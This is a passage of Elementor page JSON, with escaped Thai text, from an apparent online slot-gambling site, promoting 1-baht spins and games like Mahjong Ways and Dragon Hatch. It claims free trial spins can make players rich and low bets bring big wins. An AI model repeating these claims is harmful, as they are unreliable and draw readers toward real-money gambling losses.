\\u0e1a\\u0e32\\u0e17\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17<\\/b> <span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e21\\u0e35\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e40\\u0e01\\u0e21\\u0e18\\u0e35\\u0e21\\u0e2a\\u0e21\\u0e1a\\u0e31\\u0e15\\u0e34\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e21\\u0e31\\u0e01\\u0e21\\u0e35\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e25\\u0e44\\u0e21\\u0e49\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e40\\u0e1a\\u0e17\\u0e15\\u0e48\\u0e33\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32 \\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e23\\u0e07\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e15\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1a\\u0e17\\u0e40\\u0e1a\\u0e32\\u0e41\\u0e15\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35<\\/b><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 